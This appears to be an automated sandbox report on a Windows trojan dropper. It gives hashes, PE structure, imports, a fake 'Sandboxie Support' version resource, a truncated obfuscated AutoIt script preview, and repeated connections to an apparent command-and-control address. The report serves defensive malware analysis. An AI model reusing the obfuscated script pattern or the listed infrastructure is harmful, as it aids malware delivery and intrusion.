                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:modified
                                                                                                                                                                                              Size (bytes):893608
                                                                                                                                                                                              Entropy (8bit):6.620131693023677
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:12288:6pVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M01:6T3E53Myyzl0hMf1tr7Caw8M01
                                                                                                                                                                                              MD5:C56B5F0201A3B3DE53E561FE76912BFD
                                                                                                                                                                                              SHA1:2A4062E10A5DE813F5688221DBEB3F3FF33EB417
                                                                                                                                                                                              SHA-256:237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
                                                                                                                                                                                              SHA-512:195B98245BB820085AE9203CDB6D470B749D1F228908093E8606453B027B7D7681CCD7952E30C2F5DD40F8F0B999CCFC60EBB03419B574C08DE6816E75710D2C
                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                              Joe Sandbox View:
                                                                                                                                                                                              • Filename: Tt843YGUx5.exe, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: Tt843YGUx5.exe, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: in.exe, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: in.exe, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: KgpiJLs58m.exe, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: KgpiJLs58m.exe, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: Notion Setup 4.3.0 (4).exe, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: Notion Setup 4.3.0 (4).exe, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: JiH0aUfOU6.exe, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: JiH0aUfOU6.exe, Detection: malicious, Browse
                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L....q.Z.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):1123298
                                                                                                                                                                                              Entropy (8bit):6.0345840557815285
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:12288:X+hywYPxhrL6e111PQj0ALw4DBySXPW736KIsAAsQBy4uggkZEZJs8Z9ZzusUsmG:HGe111PQj08FySXAuggdOS
                                                                                                                                                                                              MD5:9CC422DC9F96787B5930E78750F05AC6
                                                                                                                                                                                              SHA1:A6D1C7F8F80EAFE303CB834362E5D25E989D5CA7
                                                                                                                                                                                              SHA-256:D0C14CCFCCB684A52437142AF6BB993DEB0839BA43091DF69A9F3E6B10DC2DCC
                                                                                                                                                                                              SHA-512:33D37F08F1B27AB51784A99F2FEC23E9125235234FBAD4B491976BA5E2FB71AF5F4C97F80C640B213E897B0793E60E9047E7E1202AF69203A445342A49C21773
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:$ADFxzgQ = FIKvAJS("120^67^89^117^113^70^90^112^98^79^106^106^107^85^113^107^102^116^104^99^98",0)..$rtuXmQb = 194..$paoYUBdOEheCL = 89..Do..Switch $rtuXmQb..Case 192..$emWZAYoGanEDtm = FIKvAJS("107^81^85^126",9), $JYybUPw = FIKvAJS("69^88^74^123^76^107^111",3), $meHCRxEdOMWao = FIKvAJS("113^70^99^107^102^66",1), $uNotfjGWhrhNdYErDEg = FIKvAJS("81^75^113^86^76^107^68^78^121",2)..$lmjOhbFwmIoAadPRStYUajaHZLVXfZJYrKFJcpuTvnvsa = 18..$lKTafmbBiXxBJJEReEATIOukbEfcoLVUdHerbFgEueuvzinptf = 473905+138273..While $lmjOhbFwmIoAadPRStYUajaHZLVXfZJYrKFJcpuTvnvsa < 30..$NvDHUKlezveAk = 40528+631884+524524..$emWZAYoGanEDtm = IsObj(105)..$lmjOhbFwmIoAadPRStYUajaHZLVXfZJYrKFJcpuTvnvsa = $lmjOhbFwmIoAadPRStYUajaHZLVXfZJYrKFJcpuTvnvsa + 1..WEnd..$rtuXmQb = $rtuXmQb + 1..Case 193..$VMFHJRduydSjNz = Execute(FIKvAJS("90^123^121^112^117^110^80^122^77^115^118^104^123^47^46^110^74^73^122^109^128^121^80^115^89^76^90^115^92^46^48",7))..$UGmPKDxtJKxTWvDDVwREdiOUQEEyLApguYiqwELLBIWXfXzK = 11..$DYssecpvFFMkfOvplcc
                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif
                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):1699896
                                                                                                                                                                                              Entropy (8bit):6.290547513916722
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:24576:0Na0qyFU/vb313JPCGucMBbruVALdpNQHKl3y9UfSj6HYZY8zCixcq:kFU3b3HucMBbrb/qj98deCNq
                                                                                                                                                                                              MD5:5564A98A4692BA8B2D25770FB834D5F6
                                                                                                                                                                                              SHA1:129D030D817F6B25D1FDEF2CAD33EB81DE1DEA8B
                                                                                                                                                                                              SHA-256:28AB9A0F5F50FD5398324B5EC099F5C53C6FAA701C3F6D8B0B3DA47A76C56230
                                                                                                                                                                                              SHA-512:D803E2E3425095E170910103A4470C598FD4A9A10C1217A006A6393CD1ECA06D1C628E845F6FD1071F1C92778D481F47E4E5F175005FEC2CB0A7519C90992858
                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                              Joe Sandbox View:
                                                                                                                                                                                              • Filename: hfrR6WOIt6.exe, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: services.png.exe, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: FgfPZQyCMj.exe, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: Jw1Ua7eGIy, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: 2019-09-02_22-41-10.exe, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: 0di3x.exe, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: S17.exe, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: S12.exe, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: 215.exe, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: S4.exe, Detection: malicious, Browse
                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-.=FizS.izS.izS.2.P.jzS.}.S.hzS.}.P./zS.}.].q{S.}.V.rzS.}.W..zS.}...hzS.}.Q.hzS.RichizS.........................PE..L..................!.........................0....(K.........................@......,.....@A............................U...............................8`.......Q..0z..p............................................................................text...%........................... ..`RT.................................. ..`PAGE....:.... ...................... ..`.data....Z...0......................@....mrdata.x#.......$..................@....00cfg...............:..............@..@.rsrc................<..............@..@.reloc...Q.......R...>..............@..B................................................................................................................................................................................................
                                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Entropy (8bit):7.9568154817195005
                                                                                                                                                                                              TrID:
                                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                              File name:SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe
                                                                                                                                                                                              File size:1'019'448 bytes
                                                                                                                                                                                              MD5:af3df67046abb1a4bd2600009fb51f19
                                                                                                                                                                                              SHA1:4dc05e14c3e44f51a02555d2230e1c2d8219d66f
                                                                                                                                                                                              SHA256:dc5eb50fd2c6a9351e5b2edb5ab4ddd31f5225ec5260380f05f8cf24e824bffd
                                                                                                                                                                                              SHA512:51717a3fc744d99e25c255bb5e1e354ba864900e9db57eb8ce84893ebd13f2190a3155482097bf2e70d9c522e8d7e5b853b5b32e3a42157fd702cd89d8df58e8
                                                                                                                                                                                              SSDEEP:24576:Q14aprl9jOkxoFC6TVAwHTcVrkGSWfavoVi2pB9l0AU0:Q1JZLsYVSgag7XU0
                                                                                                                                                                                              TLSH:FD252342B0F5807AE2B307728D94FDA08EFDF2B10065465F579818870DB5CD9EE4A76B
                                                                                                                                                                                              File Content Preview:MZ`.....................@...............................................!..L.!Require Windows..$..................W.......F.......P.......@.........-.....M.......y.......x.....-.........N.....Rich............................PE..L....'.S.................>.
                                                                                                                                                                                              Icon Hash:d0e0689060000000
                                                                                                                                                                                              Entrypoint:0x414285
                                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                                              Digitally signed:false
                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                              DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                              Time Stamp:0x5398270F [Wed Jun 11 09:53:19 2014 UTC]
                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                              OS Version Major:5
                                                                                                                                                                                              OS Version Minor:1
                                                                                                                                                                                              File Version Major:5
                                                                                                                                                                                              File Version Minor:1
                                                                                                                                                                                              Subsystem Version Major:5
                                                                                                                                                                                              Subsystem Version Minor:1
                                                                                                                                                                                              Import Hash:8f56203f7a6a6c416c8f2bb329455dba
                                                                                                                                                                                              Instruction
                                                                                                                                                                                              call 00007FB3DC85DDF8h
                                                                                                                                                                                              jmp 00007FB3DC85D8ACh
                                                                                                                                                                                              int3
                                                                                                                                                                                              jmp dword ptr [00415284h]
                                                                                                                                                                                              jmp dword ptr [00415288h]
                                                                                                                                                                                              jmp dword ptr [0041528Ch]
                                                                                                                                                                                              int3
                                                                                                                                                                                              int3
                                                                                                                                                                                              push 004142FDh
                                                                                                                                                                                              push dword ptr fs:[00000000h]
                                                                                                                                                                                              mov eax, dword ptr [esp+10h]
                                                                                                                                                                                              mov dword ptr [esp+10h], ebp
                                                                                                                                                                                              lea ebp, dword ptr [esp+10h]
                                                                                                                                                                                              sub esp, eax
                                                                                                                                                                                              push ebx
                                                                                                                                                                                              push esi
                                                                                                                                                                                              push edi
                                                                                                                                                                                              mov eax, dword ptr [004195FCh]
                                                                                                                                                                                              xor dword ptr [ebp-04h], eax
                                                                                                                                                                                              xor eax, ebp
                                                                                                                                                                                              push eax
                                                                                                                                                                                              mov dword ptr [ebp-18h], esp
                                                                                                                                                                                              push dword ptr [ebp-08h]
                                                                                                                                                                                              mov eax, dword ptr [ebp-04h]
                                                                                                                                                                                              mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                                                                                                              mov dword ptr [ebp-08h], eax
                                                                                                                                                                                              lea eax, dword ptr [ebp-10h]
                                                                                                                                                                                              mov dword ptr fs:[00000000h], eax
                                                                                                                                                                                              ret
                                                                                                                                                                                              mov ecx, dword ptr [ebp-10h]
                                                                                                                                                                                              mov dword ptr fs:[00000000h], ecx
                                                                                                                                                                                              pop ecx
                                                                                                                                                                                              pop edi
                                                                                                                                                                                              pop edi
                                                                                                                                                                                              pop esi
                                                                                                                                                                                              pop ebx
                                                                                                                                                                                              mov esp, ebp
                                                                                                                                                                                              pop ebp
                                                                                                                                                                                              push ecx
                                                                                                                                                                                              ret
                                                                                                                                                                                              mov edi, edi
                                                                                                                                                                                              push ebp
                                                                                                                                                                                              mov ebp, esp
                                                                                                                                                                                              push dword ptr [ebp+14h]
                                                                                                                                                                                              push dword ptr [ebp+10h]
                                                                                                                                                                                              push dword ptr [ebp+0Ch]
                                                                                                                                                                                              push dword ptr [ebp+08h]
                                                                                                                                                                                              push 004145BEh
                                                                                                                                                                                              push 004195FCh
                                                                                                                                                                                              call 00007FB3DC85DE06h
                                                                                                                                                                                              add esp, 18h
                                                                                                                                                                                              pop ebp
                                                                                                                                                                                              ret
                                                                                                                                                                                              mov edi, edi
                                                                                                                                                                                              push ebp
                                                                                                                                                                                              mov ebp, esp
                                                                                                                                                                                              mov eax, dword ptr [ebp+08h]
                                                                                                                                                                                              mov eax, dword ptr [eax]
                                                                                                                                                                                              cmp dword ptr [eax], E06D7363h
                                                                                                                                                                                              jne 00007FB3DC85DB7Dh
                                                                                                                                                                                              cmp dword ptr [eax+10h], 03h
                                                                                                                                                                                              jne 00007FB3DC85DB77h
                                                                                                                                                                                              mov eax, dword ptr [eax+14h]
                                                                                                                                                                                              cmp eax, 19930520h
                                                                                                                                                                                              je 00007FB3DC85DB67h
                                                                                                                                                                                              cmp eax, 19930521h
                                                                                                                                                                                              je 00007FB3DC85DB60h
                                                                                                                                                                                              cmp eax, 00000022h
                                                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x1711c0xb4.rdata
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x1c0000x2e19.rsrc
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x150000x308.rdata
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                              .text0x10000x13d8a0x13e006223bf6c77107cbf3dfc3cf26635d357False0.6020784198113207data6.64275010751646IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                              .rdata0x150000x316c0x32001bdba6cbf3ac9a64ed4062b575f8fb84False0.4328125data5.5477475825866875IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                              .data0x190000x2cf80x8007d59497e8d84bbc9a7bbfd7de736eb1bFalse0.3671875data3.3581565293291384IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                              .rsrc0x1c0000x2e190x300087d6d89f77c1bf96935a111e16f8a8b2False0.4663899739583333data4.756014592934324IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                              RT_ICON0x1c1f00xdc3PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedFrenchFrance0.9463525404484814
                                                                                                                                                                                              RT_ICON0x1cfb40x304PNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedFrenchFrance1.0142487046632125
                                                                                                                                                                                              RT_ICON0x1d2b80x9b8Device independent bitmap graphic, 24 x 48 x 32, image size 2448FrenchFrance0.11294212218649517
                                                                                                                                                                                              RT_ICON0x1dc700x6ccDevice independent bitmap graphic, 20 x 40 x 32, image size 1700FrenchFrance0.1425287356321839
                                                                                                                                                                                              RT_ICON0x1e33c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088FrenchFrance0.16578014184397163
                                                                                                                                                                                              RT_GROUP_ICON0x1e7a40x4cdataFrenchFrance0.8026315789473685
                                                                                                                                                                                              RT_VERSION0x1e7f00x320data0.4575
                                                                                                                                                                                              RT_MANIFEST0x1eb100x309ASCII text0.5353925353925354
                                                                                                                                                                                              DLLImport
                                                                                                                                                                                              COMCTL32.dll
                                                                                                                                                                                              KERNEL32.dllSetFileAttributesW, Sleep, GetExitCodeThread, CreateThread, SystemTimeToFileTime, GetLocalTime, GetFileAttributesW, CreateDirectoryW, lstrlenA, GetSystemDefaultLCID, GetSystemDefaultUILanguage, GetUserDefaultUILanguage, MultiByteToWideChar, GetLocaleInfoW, lstrcmpiW, GetEnvironmentVariableW, SetCurrentDirectoryW, lstrcmpW, RemoveDirectoryW, FindClose, FindNextFileW, DeleteFileW, FindFirstFileW, GetCurrentDirectoryW, GetTempPathW, WideCharToMultiByte, CompareFileTime, ExpandEnvironmentStringsW, GetSystemTimeAsFileTime, LoadLibraryA, SetEnvironmentVariableW, WriteFile, CreateFileW, GetDriveTypeW, GetModuleFileNameW, GetCommandLineW, GetModuleHandleW, GetComputerNameW, LoadLibraryW, CreateEventW, SetLastError, ResetEvent, InitializeCriticalSection, LockResource, LoadResource, FindResourceA, MulDiv, GetCurrentThreadId, GetSystemDirectoryW, TerminateThread, ResumeThread, SuspendThread, LocalFree, lstrcpyW, FormatMessageW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, VirtualAlloc, VirtualFree, GetFileSize, SetFilePointer, ReadFile, SetFileTime, SetEndOfFile, GetFileInformationByHandle, WaitForMultipleObjects, GetCurrentProcess, TerminateProcess, GetCurrentProcessId, GetTickCount, QueryPerformanceCounter, GetModuleHandleA, SetUnhandledExceptionFilter, GetStartupInfoA, InterlockedCompareExchange, InterlockedExchange, GetLastError, WaitForSingleObject, CloseHandle, GetProcAddress, lstrlenW, SetEvent, UnhandledExceptionFilter
                                                                                                                                                                                              USER32.dllDefWindowProcW, KillTimer, CallNextHookEx, PtInRect, SetWindowsHookExW, LoadImageW, LoadIconW, MessageBeep, EnableWindow, CallWindowProcW, EnableMenuItem, ReleaseDC, wvsprintfW, GetWindowLongW, SetWindowLongW, GetClientRect, GetDlgItem, GetKeyState, MessageBoxA, GetWindowDC, DrawIconEx, DialogBoxIndirectParamW, GetWindow, ClientToScreen, GetDC, IsWindow, UnhookWindowsHookEx, SendMessageW, EndDialog, CharUpperW, ShowWindow, SetWindowPos, SystemParametersInfoW, GetSystemMetrics, GetSystemMenu, SetFocus, ScreenToClient, GetWindowRect, DrawTextW, GetParent, wsprintfW, GetWindowTextW, GetWindowTextLengthW, SetWindowTextW
                                                                                                                                                                                              GDI32.dllCreateFontIndirectW, SelectObject, GetDeviceCaps, GetObjectW, DeleteObject
                                                                                                                                                                                              SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetMalloc, ShellExecuteW, SHGetSpecialFolderPathW, ShellExecuteExW, SHGetFileInfoW
                                                                                                                                                                                              ole32.dllCoCreateInstance, CoInitializeEx
                                                                                                                                                                                              OLEAUT32.dllVariantClear, SysAllocStringLen
                                                                                                                                                                                              msvcrt.dllmemcpy, strncpy, wcsncpy, wcsncmp, wcscmp, ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z, _beginthreadex, __CxxFrameHandler3, _CxxThrowException, malloc, free, wcsstr, _unlock, __dllonexit, _lock, _onexit, ??1type_info@@UAE@XZ, __getmainargs, _cexit, _exit, _XcptFilter, _ismbblead, exit, _acmdln, _initterm, _amsg_exit, __setusermatherr, __p__commode, __p__fmode, __set_app_type, _except_handler4_common, ?terminate@@YAXXZ, _controlfp, memmove, _wcsnicmp, _purecall, memset, _wtol, ??3@YAXPAX@Z, memcmp, ??2@YAPAXI@Z
                                                                                                                                                                                              DescriptionData
                                                                                                                                                                                              CompanyNamewj32
                                                                                                                                                                                              FileDescriptionSandboxie Support for Process Hacker
                                                                                                                                                                                              FileVersion1.0
                                                                                                                                                                                              InternalNameSbieSupport
                                                                                                                                                                                              LegalCopyrightLicensed under the GNU GPL, v3.
                                                                                                                                                                                              OriginalFilenameSbieSupport.dll
                                                                                                                                                                                              ProductNameSandboxie Support for Process Hacker
                                                                                                                                                                                              ProductVersion1.0
                                                                                                                                                                                              Translation0x0c09 0x04b0
                                                                                                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                              FrenchFrance
                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                              Mar 9, 2025 07:25:10.555996895 CET4972149441192.168.2.445.67.231.189
                                                                                                                                                                                              Mar 9, 2025 07:25:10.562544107 CET494414972145.67.231.189192.168.2.4
                                                                                                                                                                                              Mar 9, 2025 07:25:10.562649012 CET4972149441192.168.2.445.67.231.189
                                                                                                                                                                                              Mar 9, 2025 07:25:10.571755886 CET4972149441192.168.2.445.67.231.189
                                                                                                                                                                                              Mar 9, 2025 07:25:10.578397989 CET494414972145.67.231.189192.168.2.4
                                                                                                                                                                                              Mar 9, 2025 07:25:12.215594053 CET494414972145.67.231.189192.168.2.4
                                                                                                                                                                                              Mar 9, 2025 07:25:12.215694904 CET4972149441192.168.2.445.67.231.189
                                                                                                                                                                                              Mar 9, 2025 07:25:12.396332979 CET4972149441192.168.2.445.67.231.189
                                                                                                                                                                                              Mar 9, 2025 07:25:17.596090078 CET4972249441192.168.2.445.67.231.189
                                                                                                                                                                                              Mar 9, 2025 07:25:17.601681948 CET494414972245.67.231.189192.168.2.4
                                                                                                                                                                                              Mar 9, 2025 07:25:17.601778030 CET4972249441192.168.2.445.67.231.189
                                                                                                                                                                                              Mar 9, 2025 07:25:17.601954937 CET4972249441192.168.2.445.67.231.189
                                                                                                                                                                                              Mar 9, 2025 07:25:17.607067108 CET494414972245.67.231.189192.168.2.4
                                                                                                                                                                                              Mar 9, 2025 07:25:19.227976084 CET494414972245.67.231.189192.168.2.4
                                                                                                                                                                                              Mar 9, 2025 07:25:19.228071928 CET4972249441192.168.2.445.67.231.189
                                                                                                                                                                                              Mar 9, 2025 07:25:19.228347063 CET4972249441192.168.2.445.67.231.189
                                                                                                                                                                                              Mar 9, 2025 07:25:24.269829988 CET4972349441192.168.2.445.67.231.189
                                                                                                                                                                                              Mar 9, 2025 07:25:24.275222063 CET494414972345.67.231.189192.168.2.4
                                                                                                                                                                                              Mar 9, 2025 07:25:24.275355101 CET4972349441192.168.2.445.67.231.189
                                                                                                                                                                                              Mar 9, 2025 07:25:24.277381897 CET4972349441192.168.2.445.67.231.189
                                                                                                                                                                                              Mar 9, 2025 07:25:24.282448053 CET494414972345.67.231.189192.168.2.4
                                                                                                                                                                                              Mar 9, 2025 07:25:25.919622898 CET494414972345.67.231.189192.168.2.4
                                                                                                                                                                                              Mar 9, 2025 07:25:25.919708967 CET4972349441192.168.2.445.67.231.189
                                                                                                                                                                                              Mar 9, 2025 07:25:25.919934034 CET4972349441192.168.2.445.67.231.189
                                                                                                                                                                                              Mar 9, 2025 07:25:30.923259020 CET4972449441192.168.2.445.67.231.189
                                                                                                                                                                                              Mar 9, 2025 07:25:30.928591013 CET494414972445.67.231.189192.168.2.4
                                                                                                                                                                                              Mar 9, 2025 07:25:30.928689957 CET4972449441192.168.2.445.67.231.189
                                                                                                                                                                                              Mar 9, 2025 07:25:30.928867102 CET4972449441192.168.2.445.67.231.189
                                                                                                                                                                                              Mar 9, 2025 07:25:30.933981895 CET494414972445.67.231.189192.168.2.4
                                                                                                                                                                                              Mar 9, 2025 07:25:32.554018974 CET494414972445.67.231.189192.168.2.4
                                                                                                                                                                                              Mar 9, 2025 07:25:32.554111958 CET4972449441192.168.2.445.67.231.189
                                                                                                                                                                                              Mar 9, 2025 07:25:32.554300070 CET4972449441192.168.2.445.67.231.189
                                                                                                                                                                                              Mar 9, 2025 07:25:37.564471960 CET4972549441192.168.2.445.67.231.189
                                                                                                                                                                                              Mar 9, 2025 07:25:37.569755077 CET494414972545.67.231.189192.168.2.4
                                                                                                                                                                                              Mar 9, 2025 07:25:37.569835901 CET4972549441192.168.2.445.67.231.189
                                                                                                                                                                                              Mar 9, 2025 07:25:37.570059061 CET4972549441192.168.2.445.67.231.189
                                                                                                                                                                                              Mar 9, 2025 07:25:37.575176001 CET494414972545.67.231.189192.168.2.4
                                                                                                                                                                                              Mar 9, 2025 07:25:39.194924116 CET494414972545.67.231.189192.168.2.4
                                                                                                                                                                                              Mar 9, 2025 07:25:39.195167065 CET4972549441192.168.2.445.67.231.189
                                                                                                                                                                                              Mar 9, 2025 07:25:39.195274115 CET4972549441192.168.2.445.67.231.189
                                                                                                                                                                                              Mar 9, 2025 07:25:44.205310106 CET4972649441192.168.2.445.67.231.189
                                                                                                                                                                                              Mar 9, 2025 07:25:44.210660934 CET494414972645.67.231.189192.168.2.4
                                                                                                                                                                                              Mar 9, 2025 07:25:44.210773945 CET4972649441192.168.2.445.67.231.189
                                                                                                                                                                                              Mar 9, 2025 07:25:44.210973024 CET4972649441192.168.2.445.67.231.189
                                                                                                                                                                                              Mar 9, 2025 07:25:44.216157913 CET494414972645.67.231.189192.168.2.4
                                                                                                                                                                                              Mar 9, 2025 07:25:45.835972071 CET494414972645.67.231.189192.168.2.4
                                                                                                                                                                                              Mar 9, 2025 07:25:45.836280107 CET4972649441192.168.2.445.67.231.189
                                                                                                                                                                                              Mar 9, 2025 07:25:45.836623907 CET4972649441192.168.2.445.67.231.189
                                                                                                                                                                                              Mar 9, 2025 07:25:50.845571995 CET4972749441192.168.2.445.67.231.189
                                                                                                                                                                                              Mar 9, 2025 07:25:50.851170063 CET494414972745.67.231.189192.168.2.4
                                                                                                                                                                                              Mar 9, 2025 07:25:50.851277113 CET4972749441192.168.2.445.67.231.189
                                                                                                                                                                                              Mar 9, 2025 07:25:50.851445913 CET4972749441192.168.2.445.67.231.189
                                                                                                                                                                                              Mar 9, 2025 07:25:50.857301950 CET494414972745.67.231.189192.168.2.4
                                                                                                                                                                                              Mar 9, 2025 07:25:52.476422071 CET494414972745.67.231.189192.168.2.4
                                                                                                                                                                                              Mar 9, 2025 07:25:52.476591110 CET4972749441192.168.2.445.67.231.189
                                                                                                                                                                                              Mar 9, 2025 07:25:52.477226973 CET4972749441192.168.2.445.67.231.189
                                                                                                                                                                                              Mar 9, 2025 07:25:57.486617088 CET4972849441192.168.2.445.67.231.189
                                                                                                                                                                                              Mar 9, 2025 07:25:57.492027044 CET494414972845.67.231.189192.168.2.4
                                                                                                                                                                                              Mar 9, 2025 07:25:57.492245913 CET4972849441192.168.2.445.67.231.189
                                                                                                                                                                                              Mar 9, 2025 07:25:57.492465019 CET4972849441192.168.2.445.67.231.189
                                                                                                                                                                                              Mar 9, 2025 07:25:57.497807980 CET494414972845.67.231.189192.168.2.4
                                                                                                                                                                                              Mar 9, 2025 07:25:59.133117914 CET494414972845.67.231.189192.168.2.4
                                                                                                                                                                                              Mar 9, 2025 07:25:59.133449078 CET4972849441192.168.2.445.67.231.189
                                                                                                                                                                                              Mar 9, 2025 07:25:59.133655071 CET4972849441192.168.2.445.67.231.189
                                                                                                                                                                                              Mar 9, 2025 07:26:04.142561913 CET4972949441192.168.2.445.67.231.189
                                                                                                                                                                                              Mar 9, 2025 07:26:04.147897005 CET494414972945.67.231.189192.168.2.4
                                                                                                                                                                                              Mar 9, 2025 07:26:04.148009062 CET4972949441192.168.2.445.67.231.189
                                                                                                                                                                                              Mar 9, 2025 07:26:04.148317099 CET4972949441192.168.2.445.67.231.189
                                                                                                                                                                                              Mar 9, 2025 07:26:04.153315067 CET494414972945.67.231.189192.168.2.4
                                                                                                                                                                                              Mar 9, 2025 07:26:05.793519020 CET494414972945.67.231.189192.168.2.4
                                                                                                                                                                                              Mar 9, 2025 07:26:05.795686007 CET4972949441192.168.2.445.67.231.189
                                                                                                                                                                                              Mar 9, 2025 07:26:05.795964003 CET4972949441192.168.2.445.67.231.189
                                                                                                                                                                                              Mar 9, 2025 07:26:10.799377918 CET4973049441192.168.2.445.67.231.189
                                                                                                                                                                                              Mar 9, 2025 07:26:10.804738045 CET494414973045.67.231.189192.168.2.4
                                                                                                                                                                                              Mar 9, 2025 07:26:10.804902077 CET4973049441192.168.2.445.67.231.189
                                                                                                                                                                                              Mar 9, 2025 07:26:10.805128098 CET4973049441192.168.2.445.67.231.189
                                                                                                                                                                                              Mar 9, 2025 07:26:10.810180902 CET494414973045.67.231.189192.168.2.4
                                                                                                                                                                                              Mar 9, 2025 07:26:12.451510906 CET494414973045.67.231.189192.168.2.4
                                                                                                                                                                                              Mar 9, 2025 07:26:12.451626062 CET4973049441192.168.2.445.67.231.189
                                                                                                                                                                                              Mar 9, 2025 07:26:12.451893091 CET4973049441192.168.2.445.67.231.189
                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
